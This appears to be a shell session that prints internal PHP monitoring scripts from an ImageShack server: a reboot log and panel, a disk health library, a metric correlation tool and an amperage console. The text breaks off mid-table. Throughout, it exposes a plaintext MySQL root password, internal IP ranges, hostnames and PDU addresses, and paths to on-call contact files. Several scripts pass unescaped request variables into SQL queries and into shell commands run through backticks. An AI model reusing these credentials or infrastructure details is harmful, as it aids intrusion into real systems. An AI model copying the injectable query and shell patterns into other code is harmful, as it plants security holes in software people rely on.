-rw-r--r-- 1 root root 12795 Mar 17 2008 jquery.tablesorter.min.js
-rwxrwxrwx 1 root root 265072 Mar 14 2008 osxwp.jpg
-rw-rw-r-- 1 image image 1165 Feb 26 2008 import.txt
-rw-rw-r-- 1 image image 514 Oct 24 2005 .htaccess
-rw-r--r-- 1 image image 0 Aug 16 2005 index.php
# cat /home/image/www/dev/rebootfinder.php
<html>
<head>
<style type='text/css'>
<!--
a { color: #fff;}
.a_row { background-color: #059; color: #fff; border: solid 1px #fff; wid
th: 135px; }
.typelist {background-color: #059; color: #fff; font-size: 8pt; border: so
lid 1px #bbb; width:650px; padding:3px}
-->
</style>
<title>Reboot Management Panel</title>
</head>
<body style='background-image: url("osxwp.jpg"); background-position:center;
font-family: tahoma; font-size: 10pt;'>
<h1 style='border-bottom: 3px solid #FFF; font-family: tahoma; color: #FFF;'
>ImageShack Corp Enterprise 7 Reboot Management Panel</h1>
<p style="color: #fff"><a href="http://gslb.imageshack.us/dev/reboot_log.php
">Reboot Log</a></p>
<?php
if(!$sort) $sort = "months";
$type_map = array (null,"h","d");
$dbh = mysql_connect("localhost","root","mutaborius");
mysql_select_db("snmp");
function comma($_) {
$_ = sprintf("%0.2f",$_);
return strrev( (string)preg_replace( '/(\d{3})(?=\d)(?!\d*\.)/', '$1
,' , strrev( $_ ) ) );
}
if($sort == "years"){
$query = "select YEAR(FROM_UNIXTIME(entry_time)),count(server_id) a
s count from auto_reboot_log where YEAR(FROM_UNIXTIME(entry_time)) > 2007 gr
oup by YEAR(FROM_UNIXTIME(entry_time))";
} elseif ($sort == "months"){
$query = "select MONTHNAME(FROM_UNIXTIME(entry_time)),YEAR(FROM_UNIXTIME(en
try_time)),count(server_id) as count from auto_reboot_log where YEAR(FROM_UN
IXTIME(entry_time)) > 2007 group by MONTHNAME(FROM_UNIXTIME(entry_time))";
} elseif ($sort == "days"){
$query = "select DAYOFMONTH(FROM_UNIXTIME(entry_time)),MONTHNAME(FROM_UNIXT
IME(entry_time)),YEAR(FROM_UNIXTIME(entry_time)),count(server_id) as count f
rom auto_reboot_log where YEAR(FROM_UNIXTIME(entry_time)) > 2007 group by DA
YOFMONTH(FROM_UNIXTIME(entry_time)),MONTHNAME(FROM_UNIXTIME(entry_time)),YEA
R(FROM_UNIXTIME(entry_time))";
} elseif ($sort == "select"){
list($month,$year) = explode(".",$monthyear);
$query = "select MONTHNAME(FROM_UNIXTIME(entry_time)),DAYOFMONTH(FROM_UNIXT
IME(entry_time)),YEAR(FROM_UNIXTIME(entry_time)),count(server_id) as count f
rom auto_reboot_log where YEAR(FROM_UNIXTIME(entry_time)) = $year and MONTHN
AME(FROM_UNIXTIME(entry_time)) = $month group by DAYOFMONTH(FROM_UNIXTIME(en
try_time))";
}
$year = "YEAR(FROM_UNIXTIME(entry_time))";
$month = "MONTHNAME(FROM_UNIXTIME(entry_time))";
$day = "DAYOFMONTH(FROM_UNIXTIME(entry_time))";
$result = mysql_query($query." order by entry_time desc");
$data = @mysql_fetch_array ($result, MYSQL_ASSOC);
@mysql_data_seek($result,0);
while ($data = @mysql_fetch_array($result, MYSQL_ASSOC)) {
$forlater .= "<tr>\n";
$forlater .= " <td class=a_row>".$data[$month]." ".$data[$day]." ".$
data[$year]." </td>";
$forlater .= " <td class=a_row align=\"right\">$data[count]</td>\n";
$forlater .= "</tr>\n";
$total +=$data[count];
}
$nmonth = date("n");
$nyear = date("Y");
if($sort == "select") { $globals = " You can modify the month/year globals a
bove."; }
echo '<div class=typelist>sort by: <a href="?sort=years">years</a>, <a href=
"?sort=months">months</a>, <a href="?sort=days">days</a>, <a href="?sort=sel
ect&monthyear='.$nmonth.'.'.$nyear.'">select a month and year</a>.'.$globals
.'</div>';
echo "<table cellspacing=2 cellpadding=2 border=0>";
echo "<tr><td colspan=1 class=\"a_row\"><b>Total</b></td><td class=\"a_row\
" align=\"right\"><b> $total</b></td></tr>";
echo $forlater;
echo "<tr><td colspan=1 class=\"a_row\"><b>Total</b></td><td class=\"a_row\
" align=\"right\"><b> $total</b></td></tr>";
echo "</table>";
echo "<div class=\"typelist\">$query</div>";
?>
</body></html>
# cat /home/image/www/dev/correl.php
<?php
//define your sample of machines
$whereclause = "where type = 'is' and ip like '208.94.2.%'";
include('dnsConnect.php');
//makes a "compare two items" array out of all the columns you decide to lis
t
function make_compare_array ($listvars){
$count = count($listvars)-1;
for($i = 0; $i <= $count; $i++){
for($j = 0; $j <= $count; $j++){
if($listvars[$i] != $listvars[$i+$j] && $listvars[$i
+$j]){
$compare[] = $listvars[$i]." ".$listvars[$i
+$j];
}
}
}
return $compare;
}
//list of columns to compare
$stringvars =
"error504,total_drives,corecount,highutil,highutil_average,issue_points,uplo
ad_time,arch,averagedir,packetloss,light_new,raptor,errors_new,ram,traf_last
30days,iowait_24_avg,load_24_avg,cpu,iowait,sysload,speed,indnsbool,hd_free,
hd_total,upload_weight,connections,uptime,bootytime,temp,torrent,hadoop,tota
l_reqs,fnf404,ifs,noatime,memusage,amps,badfront200,halfplex,uploads,deviati
on,roxy,upload_time";
$listvars = explode(",",$stringvars);
$compare_array = make_compare_array($listvars);
//start page render
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
<html><head>
<title>Correlational Coefficients</title>
<script type=\"text/javascript\">$javHead</script>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8
859-1\">
<script src=\"sorttable.js\"></script>
<body style='background: #f7f7f7; font-family: arial;'>
<h1>Machine sample: $whereclause</h1>";
//count the rows (for the correlational coefficient function
$result = mysql_query("SELECT id FROM snmp_traffic $whereclause order by
id ASC", $bd);
$n = mysql_num_rows($result);
foreach($compare_array as $two){
list($x,$y) = explode(" ",$two);
//return the correlational coefficient
$query = "SELECT (sum($x*$y)-$n*avg($x)*avg($y))/(($n-1)*stddev($x)*std
dev($y)) as correlation from snmp_traffic $whereclause";
$result2 = mysql_query($query, $bd);
while ($data = mysql_fetch_array ($result2, MYSQL_ASSOC)) {
$value = sprintf("%.04f", $data[correlation]);
if($value > .3 or $value < -.3){
$correlation["$x $y"] = $value;
}
}
}
arsort($correlation);
$total = count($correlation);
echo "Made $total comparisons<br /><br />";
echo "<table cellspacing=0 cellpadding=0><tr class='a_row'><td><b>comparison
</b></td><td width=70 align=right><b>value</b></td></tr>";
foreach($correlation as $columns => $value){
echo "<tr class='h_row'><td>$columns:</td><td width=70 align=right>$value</
td></tr>";
}
echo "</table>";
echo "</body></html>";
?>
# cat /home/image/www/dev/dnsConnect.php
<?php
$bd = mysql_connect("127.0.0.1", "root", "mutaborius");
mysql_select_db("snmp", $bd);
?>
# cat /home/image/www/dev/queries.php
<?php
function drive_table(){
for($i = 1; $i <= 6; $i++) {
$types[] = $i;
}
$column_string = "device,fs,serial,map,version,name,ranges,stuff,capacity,us
ed,free,cycles,hours,temper,sector,badcable,hderrors,writes,reads,util,inode
";
$columns = explode(",",$column_string);
foreach($types as $type){
$final_column_array = array();
foreach($columns as $column){
$final_column_array[] = "d".$type."_".$column;
}
$final_column_string = implode(",",$final_column_array);
$queries['broken-'.$type] = "select ip,id,cell,macad,$final_column_string f
rom snmp_traffic where type = \"is\" and (d".$type."_badcable > 5 or d".$typ
e."_hderrors > 5 and d".$type."_sector > 0)";
$queries['wrongsize-'.$type] =
"select ip,id,cell,macad,$final_column_string from snmp_traffic where type =
\"is\" and (d".$type."_total/d".$type."_capacity < .85) && d".$type."_seria
l && d".$type."_total > 0 && d".$type."_capacity > 0";
}
# cat /home/image/www/dev/health_functions.php
<?php
function divgraph($column,$max){
global $color;
$percent = @round(($column/$max)*100);
if($percent > 100){ $percent = 100; }
$column = round($column,1);
if($percent >= 0){ $bcolor = $color[blue]; }
if($percent > 20){ $bcolor = $color[green]; }
if($percent > 45){ $bcolor = $color[yellow]; }
if($percent > 75){ $bcolor = $color[orange]; }
if($percent > 90){ $bcolor = $color[red]; }
return "<td align=right style=\"background: #$bcolor;\">$column</td>
";
}
function time_since_short($original) {
global $email;
$chunks = array(
array(60 * 60 * 24 * 365 , 'y'),
array(60 * 60 * 24 * 30 , 'M'),
array(60 * 60 * 24 * 7, 'w'),
array(60 * 60 * 24 * 1, 'd'),
array(60 * 60 , 'h'),
array(60 * 1 , 'm'),
array(1 * 1 , 's'),
);
$today = time(); /* Current unix time */
$since = $today - $original;
for ($i = 0, $j = count($chunks); $i < $j; $i++) {
$seconds = $chunks[$i][0];
$name = $chunks[$i][1];
if (($count = floor($since / $seconds)) != 0) {
break;
}
}
$print = $count.$name;
return $print;
}
function get_reasons(){
$time = time();
$queries["reasons-".$time] = "select id,reasons from snmp_traffic where uplo
ad_weight = 0 and type = \"is\"";
return $queries;
}
function drive_table(){
for($i = 1; $i <= 6; $i++) {
$types[] = $i;
}
$column_string = "device,fs,serial,map,name,ranges,capacity,used,free,reserv
e,cycles,hours,temper,error_197,error_198,error_199,error_5,error_FAIL,reado
nly,writes,reads,util";
$columns = explode(",",$column_string);
foreach($types as $type){
$final_column_array = array();
foreach($columns as $column){
if($column == "capacity"){
$final_column_array[] = "round(d".$type."_".$column."*1.07374182)";
} else {
$final_column_array[] = "d".$type."_".$column;
}
}
$final_column_string = implode(",",$final_column_array);
$queries['broken-'.$type] = "select ip,name,cell,macad,mobo,type,$final_col
umn_string,roles from snmp_traffic where d".$type."_error_197 > 0 or d".$typ
e."_error_198 > 0 or d".$type."_error_199 > 0 or d".$type."_error_5 > 0 or d
".$type."_error_FAIL > 0";
$queries['wrongsize-'.$type] = "select ip,name,cell,macad,mobo,type,$final_
column_string,roles from snmp_traffic where (d".$type."_total/d".$type."_cap
acity < .85) && d".$type."_total > 0 && d".$type."_capacity > 0 && d".$type.
"_serial != \"\"";
$queries['nodriveuse-'.$type] = "select ip,name,cell,macad,mobo,type,$final
_column_string,roles from snmp_traffic where d".$type."_reads < .1 && d".$ty
pe."_writes < .1 && d".$type."_serial != \"\"";
}
return $queries;
}
function grand_table(){
$groups[] = "distro";
$groups[] = "shortcpu";
$groups[] = "datacenter";
$groups[] = "type";
$groups[] = "kernel";
$groups[] = "ram";
$groups[] = "arch";
$groups[] = "mobo";
$groups[] = "total_drives";
$groups[] = "pduip";
$groups[] = "gig";
$groups[] = "corecount";
$types[] = "sum";
$types[] = "avg";
$column_string = "uptime/86400,upload_weight,speed,iowait,iowait_24_avg,sysl
oad,load_24_avg,upload_time,uploads,temp,hightemp,idlecpu,hd_free,hd_total,r
am";
$columns = explode(",",$column_string);
foreach($groups as $group){
foreach($types as $type){
$final_column_array = array();
foreach($columns as $column){
$final_column_array[] = "round($type($column),1)";
}
$final_column_string = implode(",",$final_column_array);
$is[$group.'-'.$type] = "select $group,count(*),$final_column_string from
snmp_traffic where type = \"is\" group by $group;";
$ro[$group.'-'.$type] = "select $group,count(*),$final_column_string from
snmp_traffic where type != \"is\" group by $group;";
}
}
return array($is,$ro);
}
function bookmarks($location){
$bookmarks = @file("/home/image/www/dev/$location");
if($location != "favorites.txt"){
$blank = "target=_blank";
} else {
$array = file("/home/image/www/dev/favorites.count",FILE_IGNORE_NEW_LINES)
;
$c = 0;
}
foreach($bookmarks as $bookmark){
$bookmark = trim($bookmark);
$check = substr($bookmark,0,2);
if($check != "//"){
list($name,$url,$title) = explode("--",$bookmark);
if($location == "favorites.txt"){
$count = ":".$array[$c];
$c++;
}
$allbookmarks .= "<a href=\"$url\" $blank title=\"$t
itle\">$name</a>$count ";
}
}
return $allbookmarks;
}
function get_color($hour){
$string = "f,c,b,a,9,8,7,6,5,4,3,2,1";
$array = explode(",",$string);
$total = round($hour/6);
$letter = $array[$total];
$color = "ff".$letter.$letter.$letter.$letter;
if(!trim($letter)){ $color = "ff1111"; }
return $color;
}
function make_temp(){
$data = explode("\n",trim(`mysql -u root -pmutaborius snmp -e "select rack,a
vg(temp) from snmp_traffic where temp > 20 and temp < 100 group by rack"`));
$crap = array_shift($data);
foreach($data as $line){
list($column,$average) = explode("\t",$line);
$average = round($average);
$comma_list .= $average.",";
$pipe_list .= $column."|";
if($average > 40){
$tempalerts .= "$column: $average\n";
}
}
file_put_contents("/home/image/www/bigtemp.txt",$tempalerts);
$comma_list = substr($comma_list,0,-1);
$pipe_list = substr($pipe_list,0,-1);
$url = "http://chart.apis.google.com/chart?cht=bvs&chco=ff8855&chd=t:$comma_
list&chds=25,48&chs=600x250&chl=$pipe_list&chtt=DatacenterTemperature&chxt=y
&chbh=16,3,15&chxl=0:|25|27|30|33|36|39|42|45|48&chf=bg,s,f7f7f7";
$string = "<img border=0 src=\"$url\" />";
return $string."\n";
}
function make_words(){
$name = strtolower(trim(file_get_contents("/home/image/www/oncall.person"))
);
$details = trim(`cat /home/image/www/oncall.numbers | grep $name`);
list($name,$email) = explode(" ",$details);
list($phone,$provider) = explode("@",$email);
$c = preg_split('//', $phone, -1,PREG_SPLIT_NO_EMPTY);
$human_phone = "(".$c[0].$c[1].$c[2].") ".$c[3].$c[4].$c[5]."-".$c[6].$c[7]
.$c[8].$c[9];
$schedule = nl2br(trim(`tail -10 /home/image/www/oncall.schedule`));
$numbers = nl2br(file_get_contents("/home/image/www/oncall.numbers"));
$time = time();
return "on call: <a class=tooltip>
<b>$name</b>
<span>
$schedule<br /><br />
img997:/home/image/www<br />
oncall.schedule<br />
oncall.numbers<br />
current time: $time
</span>
</a> @ <a class=tooltip><b>$human_phone</b><span>$numbers</span></a> / $emai
l";
}
function makeReadableDisk($variable,$serials){
global $filter;
$column_string = "device,fs,serial,map,name,ranges,capacity,used,free,reser
ve,cycles,hours,temper,error_197,error_198,error_199,error_5,error_FAIL,read
only,writes,reads,util";
$typeArray = explode(",", $column_string);
foreach($variable[matches] as $server => $array){
$variable[$server] = $array;
}
foreach($variable as $single){
$total_count++;
if(!is_numeric($single[stamplast])){ continue; }
$single[id] = str_replace("(","",$single[id]);
$single[name] = str_replace("(","",$single[name]);
$displayHD .= "img$single[id]<br />\n";
$displayHD .= "<table cellspacing=3 cellpadding=1 border=0 w
idth=100%><tr>";
foreach($typeArray as $type) {
if(eregi("error",$type)){
list($crap,$error) = explode("_",$type);
$displayType = "e$error";
} else {
$displayType = $type;
}
$displayHD .= "<th>$displayType</th>";
}
$displayHD .= "</tr><tr>";
for ($k = 1; $k <= 6; $k++) {
foreach($typeArray as $type) {
$single["d".$k."_device"] = str_replace("WDCWD", "",
$single["d".$k."_device"]);
$single["d".$k."_device"] = str_replace("-","",$single["d".$k."_device"])
;
$single["d".$k."_ranges"] = str_replace("-","*",$single["d".$k."_r
anges"]);
if ($single["d".$k."_serial"]) {
if($type == "capacity") {
$displayHD .= "<td align=right>".round($single["d".$k."_".$type]*1024*10
24*1024/1000/1000/1000,0);
} elseif($type == "serial"){
$sendserial = $single["d".$k."_".$type];
$sendsize = round($single["d".$k."_capacity"]*1024*1024*1024/1000/1000/1
000,0);
if($single["d".$k."_error_5"] > 0 || $single["d".$k."_error_FAIL"] > 0 |
| $single["d".$k."_error_197"] > 0 || $single["d".$k."_error_198"] > 0 || $s
ingle["d".$k."_error_199"] > 0 || $single["d".$k."_readonly"] > 0){
$single[color] = "red";
} else {
$single[color] = "black";
}
$displayHD .= "<td><b><font color=".$single[color].">".$single["d".$k."_
".$type]."</font></b></td>";
$sendsize = "";
$sendserial = "";
} else {
$displayHD .= "<td align=right>".$single["d"
.$k."_".$type]." </td>";
}
}
}
$displayHD .= "</tr><tr>";
}
$displayHD .= "</tr></table>";
}
return $displayHD;
}
function natksort(&$aToBeSorted)
{
$aResult = array();
$aKeys = array_keys($aToBeSorted);
natcasesort($aKeys);
foreach ($aKeys as $sKey)
{
$aResult[$sKey] = $aToBeSorted[$sKey];
}
return $aResult;
}
function dumpify($hourback,$get_server){
if(!is_numeric($hourback)) { exit(); }
$file = trim(`cat /tmp/alldumps.txt | tail -$hourback | head -1`);
$dump = "/disk2/dumps/".$file;
$return_stamp = filemtime($dump);
`mysql -uroot -hlocalhost -pmutaborius snmp < $dump`;
return $return_stamp;
}
function time_since($original) {
$chunks = array(
array(60 * 60 * 24 * 365 , 'year'),
array(60 * 60 * 24 * 30 , 'month'),
array(60 * 60 * 24 * 7, 'week'),
array(60 * 60 * 24 , 'day'),
array(60 * 60 , 'hour'),
array(60 , 'minute'),
array(1, 'second'),
);
$today = time(); /* Current unix time */
$since = $today - $original;
for ($i = 0, $j = count($chunks); $i < $j; $i++) {
$seconds = $chunks[$i][0];
$name = $chunks[$i][1];
if (($count = floor($since / $seconds)) != 0) {
break;
}
}
$print = ($count == 1) ? '1 '.$name : "$count {$name}s";
if ($i + 1 < $j) {
$seconds2 = $chunks[$i + 1][0];
$name2 = $chunks[$i + 1][1];
if (($count2 = floor(($since - ($seconds * $count)) / $secon
ds2)) != 0) {
$print .= ($count2 == 1) ? ', 1 '.$name2 : ", $count
2 {$name2}s";
}
}
return $print;
}
function co($_) {
return strrev((string)preg_replace('/(\d{3})(?=\d)(?!\d*\.)/', '$1,'
, strrev($_ ) ) );
}
function human($display) {
$human = round($display/1024/1024);
return $human;
}
function h($display) {
$h = sprintf("%.01f", $display);
return $h;
}
function i($display) {
$i = round($display, 0);
return $i;
}
function j($display) {
$j = sprintf("%0.2f", $display);
return $j;
}
function k($display) {
$k = sprintf("%.01f", $display/1024);
return $k;
}
?>
# cat /home/image/www/dev/pasthd.php
<?
if($hourback < 0){ exit; }
include("health_functions.php");
include("dnsConnect.php");
if(!is_numeric($hourback)){ exit("what1"); }
if($hourback == 0){
$table = "traffic";
} else {
$dumptime = dumpify($hourback,$get_server);
$time = time_since($dumptime);
$stamp = date("M d, Y g:i:s a", $dumptime);
$title = "$time ago at $stamp";
$table = "fake";
}
$result = mysql_query("SELECT * FROM snmp_$table where name = '$get_server'"
, $bd);
while ($data = mysql_fetch_array ($result, MYSQL_ASSOC)) {
$variable[$get_server] = $data;
$displayHD = @makeReadableDisk($variable);
$reasons = $variable[$get_server];
$variable[$get_server] = array();
}
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//E
N\">
<html><head>
<title>$title</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8
859-1\">";
echo "<link rel=\"stylesheet\" href=\"devstyle.css\" type=\"text/css\">";
echo "</head><body>";
echo $displayHD;
if($hourback != 0){
echo "<pre>";
print_r($reasons);
echo "</pre>";
} else {
echo "<table class=DataTable>
<tr>
<td class=iphone>id / name / cell</td>
<td class=iphone>$reasons[id] $reasons[name] $reasons[cell] </td>
</tr>
<tr>
<td class=iphone>pdu ip/port</td>
<td class=iphone>$reasons[pduip] $reasons[port]</td>
</tr>
<tr>
<td class=iphone>gateway</td>
<td class=iphone>$reasons[gateway]</td>
</tr>
<tr>
<td class=iphone>netblock</td>
<td class=iphone>$reasons[switch]</td>
</tr>
<tr>
<td class=iphone>mobo / ram</td>
<td class=iphone>$reasons[mobo] $reasons[ram]</td>
</tr>
<tr>
<td class=iphone>cpu</td>
<td class=iphone>$reasons[cpu]x$reasons[corecount]$reasons[shortcpu]
</td>
</tr>
<tr>
<td class=iphone>mac</td>
<td class=iphone>$reasons[macad]</td>
</tr>
<tr>
<td class=iphone>kernel</td>
<td class=iphone>$reasons[kernel]</td>
</tr>
</table>";
}
echo $variable[$get_server][reasons];
echo "</body></html>";
?>
# cat /home/image/www/dev/reboot_log.php
<html>
<head>
<style type='text/css'>
<!--
a { color: #fff; }
p { color: #fff; }
div#legend {float: left; width: 125px; font-size: 10pt; text-align: center
; }
.a_row { display: block; background-color: #0c0; color: #111; padding: 1px
; margin: 1px; width:600px; }
.h_row { display: block; background-color: #fff; color: #111; padding: 1px
; margin: 1px; width:600px; }
.n_row { display: block; background-color: #fc9; color: #111; padding: 1px
; margin: 1px; width:600px; }
.x_row { display: block; background-color: #f55; color: #111; padding: 1px
; margin: 1px; width:600px; }
-->
</style>
<title>Reboot Log</title>
</head>
<body style='background: #111; background-position:center; font-family: taho
ma; font-size: 10pt;'>
<h1 style='border-bottom: 3px solid #FFF; font-family: tahoma; color: #FFF;'
>ImageShack Corp Enterprise 7 Reboot Log</h1>
<p style="color: #fff"><a href="http://gslb.imageshack.us/dev/rebootfinder.p
hp">Reboot Amounts</a></p>
<div id='legend'>
<span class='a_row'>Automated</span> <span class='h_row'>Human</span> <span
class='n_row'>Netboot</span> <span class='x_row'>Overheat</span>
<br clear='both'/>
</div>
<br clear='both' />
<?php
$chattr = trim(`touch /home/image/www/auto.reboots 2>&1 | grep Perm | wc -l`
);
if($chattr == 0) {
$mode = "<b><a style=\"color: #0c0\" href=http://gslb.imageshack.us/disable
.php>ENABLED</a></b></font> between 9pm - 9am";
} else {
$mode = "<b><a style=\"color: #f55\" href=http://gslb.imageshack.us/enable.
php>DISABLED</a></b></font>";
}
echo "<p>Automated reboots are currently $mode.</p>";
include("health_functions.php");
include("/home/image/www/auths.php");
$users = user_array();
foreach($users as $user_name => $data){
$values[$data[id]] = $user_name;
}
$dbh = mysql_connect("localhost","root","mutaborius");
mysql_select_db("snmp");
$results = mysql_query("SELECT * FROM auto_reboot_log order by entry_time de
sc limit 100");
if (mysql_num_rows($results) > 0) {
while ($r = mysql_fetch_assoc($results)) {
$classes[1] = 'a_row';
$classes[2] = 'h_row';
$classes[3] = 'x_row';
$classes[4] = 'n_row';
$actions[1] = 'rebooted';
$actions[2] = 'rebooted';
$actions[3] = 'powered down';
$actions[4] = 'netbooted';
$class = $classes[ $r['actor'] ];
$action = $actions[ $r['actor'] ];
$user_name = $values[ $r['user'] ];
if(trim($user_name)){ $user_name = "by $user_name"; }
print "<span class='{$class}'>{$r['server_id']} was {$action} ". time_sinc
e($r['entry_time']) ." ago at [". date("M d, Y h:i:s a", $r['entry_time']).
"] $user_name</span>\n";
}
} else {
print "<span class='row'>No Entries Found.</span>";
}
?>
</body>
</html>
# cat /home/image/www/dev/import.php
<?php
$dc[equi] = '10.102';
$dc[rd] = '10.101';
$dc[sj1090] = '10.103.7';
$dc[sj1650] = '10.103.6';
$dc[sj1655] = '10.103.1';
$colors[equi] = "ff9";
$colors[rd] = "9cf";
$colors[sj1090] = "fc9";
$colors[sj1655] = "cfc";
$colors[sj1650] = "ccf";
$array['1460'] = '10.101.6.240';
$array['1461'] = '10.101.6.241';
$array['1137'] = '10.103.6.240';
$array['1141'] = '10.103.6.241';
$array['1126'] = '10.103.7.246';
$array['1127'] = '10.103.7.247';
$array['1556'] = '10.103.7.248';
$array['1456'] = '10.101.3.240';
$array['1458'] = '10.101.3.241';
$array['1457'] = '10.101.3.242';
$array['1459'] = '10.101.3.243';
$array['1150'] = '10.102.1.240';
$array['1146'] = '10.102.1.241';
$array['1147'] = '10.102.1.242';
$array['1148'] = '10.102.1.243';
$array['1149'] = '10.102.1.244';
$array['1151'] = '10.102.4.240';
$array['1152'] = '10.102.4.241';
$array['1153'] = '10.102.4.242';
$array['1115'] = '10.103.1.240';
$array['1116'] = '10.103.1.241';
$array['1117'] = '10.103.1.242';
$array['1112'] = '10.103.1.243';
$array['1114'] = '10.103.1.244';
$array['1113'] = '10.103.1.245';
$array['1119'] = '10.103.1.246';
$array['1118'] = '10.103.1.247';
$array['1111'] = '10.103.1.248';
$array['1139'] = '10.103.6.242';
$array['1143'] = '10.103.6.243';
$array['1142'] = '10.103.6.244';
$array['1138'] = '10.103.6.245';
$array['1140'] = '10.103.6.246';
$array['1124'] = '10.103.7.240';
$array['1122'] = '10.103.7.241';
$array['1125'] = '10.103.7.242';
$array['1121'] = '10.103.7.243';
$array['1128'] = '10.103.7.244';
$array['1129'] = '10.103.7.245';
$end = time();
$start = $end-60*60*24;
function cacti($ip){
global $array,$start,$end;
$flip = array_flip($array);
$id = $flip[$ip];
$url = "<a class=tooltip href='http://".$ip."/' target='_blank'>$ip<span><i
mg src=http://mpmon1.imageshack.us/cacti/graph_image.php?local_graph_id=$id&
rra_id=0&view_type=tree&graph_start=$start&graph_end=$end /></span></a>";
return $url;
}
$legos = @file("/home/image/www/hostnames.txt", FILE_IGNORE_NEW_LINES);
function is_legos($name){
$name = trim($name);
global $legos;
foreach($legos as $hostname){
$hostname = trim(str_replace(".imageshack.us","",$hostname));
if($name == $hostname){
return TRUE;
break;
}
}
}
function get_datacenter($ip){
global $dc;
foreach($dc as $datacenter => $octets){
if(eregi($octets,$ip)){
$return = $datacenter;
break;
}
}
return $return;
}
$guaged = file("/tmp/apc.guaged");
foreach($guaged as $ipguage){
$ipguage = trim($ipguage);
list($ip,$guage) = explode(" ",$ipguage);
if($ip == "10.101.3.241" || $ip == "10.101.3.240"){ $guage = $guage-8; }
$amps[$ip] = sprintf("%.01f", $guage);
}
$walked = file("/tmp/apc.walked");
foreach($walked as $walk){
$walk = trim($walk);
list($name,$ip,$port) = explode(" ",$walk);
$serial[$name] = array($ip,$port);
}
$dbh = mysql_connect("127.0.0.1","root","mutaborius");
mysql_select_db('snmp');
$apc_log_update = "UPDATE snmp_traffic set port = %d, pduip = '%s', amps = %
f where name = '%s'";
$array_of_valid_machines = explode(" ",trim(`cat /home/image/www/idiplist.tx
t | cut -d" " -f1 | xargs`));
foreach ($serial as $name => $data) {
list($ip,$port) = $data;
if(in_array($name,$array_of_valid_machines)){
$list[$ip][] = $name;
}
$cooked_update = sprintf($apc_log_update, $port, $ip, $amps[$ip], $n
ame);
mysql_query($cooked_update);
}
$amps_array = array();
foreach ($list as $ip => $array_of_servers) {
$datacenter = get_datacenter($ip);
$ip = trim($ip);
if($amps[$ip] <= 30){ $color = "c01"; }
if($amps[$ip] < 18){ $color = "d70"; }
if($amps[$ip] <= 16){ $color = "cc0"; }
if($amps[$ip] <= 15){ $color = "3d0"; }
if($amps[$ip] <= 10){ $color = "66f"; }
if($amps[$ip] >= 18.5 && $ip && $ip != 0 and $amps[$ip] < 200){
$send_alert[$ip] = round($amps[$ip])."+";
$alerts .= "$ip $datacenter: $send_alert[$ip]\n";
}
if($amps[$ip] < 16){
$effic = 16-$amps[$ip];
} else {
$effic = 0;
}
$c++;
$count[$datacenter]++;
$count['all-colos']++;
$totaleff[$datacenter]['free'] += sprintf("%.01f",$effic);
$totaleff[$datacenter]['total'] += sprintf("%.01f",$amps[$ip]);
$totaleff[$datacenter]['kilowatts'] += sprintf("%.01f",$amps[$ip]*110/1000)
;
$totaleff[$datacenter]['servers'] += count($array_of_servers);
$totaleff[$datacenter]['serverspace'] += round($effic*.8);
$totaleff['all-colos']['free'] += sprintf("%.01f",$effic);
$totaleff['all-colos']['total'] += sprintf("%.01f",$amps[$ip]);
$totaleff['all-colos']['kilowatts'] += sprintf("%.01f",$amps[$ip]*11
0/1000);
$totaleff['all-colos']['servers'] += count($array_of_servers);
$totaleff['all-colos']['serverspace'] += round($effic*.8);
natsort($array_of_servers);
$final_array = array();
foreach($array_of_servers as $single_server){
if(!is_legos($single_server)){
$final_array[] = "<font color=orange>$single_server</font>";
} else {
$final_array[] = "$single_server";
}
}
$joined = str_replace("img","",implode(" ",$final_array));
$amps_array[] = $amps[$ip];
if(in_array($amps[$ip],$amps_array)){
$keyed_amps = $amps[$ip]."-".$c;
} else {
$keyed_amps = $amps[$ip];
}
$listfinal[$datacenter][$keyed_amps] = "<div class='square'><span style='c
olor: #".$color."'><b>".$amps[$ip]."</b> </span>".cacti($ip)." in
<b><span style='color: #".$colors[$datacenter]."'>".$datacenter."</span>
</b>:</span>
".$joined."
</div>\n";
}
ksort($listfinal);
foreach($listfinal as $rdata){
ksort($rdata);
foreach($rdata as $data) {
$alldata .= $data;
}
}
$kwh = sprintf("%.01f",$totaleff['all-colos']['kilowatts']/6);
file_put_contents("/home/image/www/kwh.txt",$kwh."\n", FILE_APPEND);
if(trim($alerts)){
file_get_contents("http://stream.imageshack.us/alert_writer.php?alert_name=
pduamps&alert_content=$alerts");
}
$send .= "<html>
<head>
<title>ImageShack Amerage Console</title><style>
.square { width: 95%; text-align: left; padding: 5px; border: 1px solid #666
; border-bottom: 0px; font-family: verdana; font-size: 10pt; background: bla
ck; color: #eee; }
a { color: #eee; }
tr { font-family: verdana; font-size: 10pt; color: #eee;}
a.tooltip { cursor: pointer; }
a.tooltip { text-decoration: none; }
a.tooltip:hover { background: none; /* correction for an IE bug*/ }
a.tooltip { position:relative; z-index:24; text-decoration:none; }
a.tooltip:hover { z-index:25; }
a.tooltip span { display: none; }
a.tooltip:hover span {
display: inline; position: absolute;
display: block; background: #f7f7f7; color: #111; padding: 2px; marg
in: 2px; text-align: left;
border: dotted 1px #083;
}
</style>";
$send .= '<script type="text/javascript" src="jquery-1.4.2.min.js"></script>
'; //http://code.jquery.com/jquery-1.4.2.min.js
$send .= '<script type="text/javascript" src="jquery.tablesorter.min.js"></s
cript>'; //http://tablesorter.com/jquery.tablesorter.min.js
$send .= '<script>$(document).ready(function()
{
$("#t1").tablesorter({ sortList: [[9,1]] });
}
);</script>';
$meter = trim(`cat /home/image/www/kwh.txt | awk '{sum += \$1} END {print su
m}'`);
$send .= "</head>
<body style='background: black;'>
<h1 style='border-bottom: 3px solid #FFF; font-family: courier; color: #FFF
;'>ImageShack APC Console - Meter: $meter kwh since September 1, 2010</h1>";
$send .= "<table class=\"tablesorter\" id=\"t1\" cellspacing=0 cellpadding=5
border=0>
<thead>
<tr>
<th>datacenter</th>
<th>used amps</th>
<th>free amps</th>
<th>kilowatts</th>
<th>live circuits</th>
<th>amps per server</th>
<th>amps per circuit</th>
<th>efficiency</th>
<th>servers attached</th>
<th>space for more servers</th>
</tr></thead><tbody>";
ksort($totaleff);
foreach($totaleff as $location => $info_array){
$send .= "<tr>
<td><span style='color: $colors[$location]'><b>$location</b></span></td>
<td align=right>$info_array[total]</td>
<td align=right>$info_array[free]</td>
<td align=right>$info_array[kilowatts]</td>
<td align=right>$count[$location]</td>
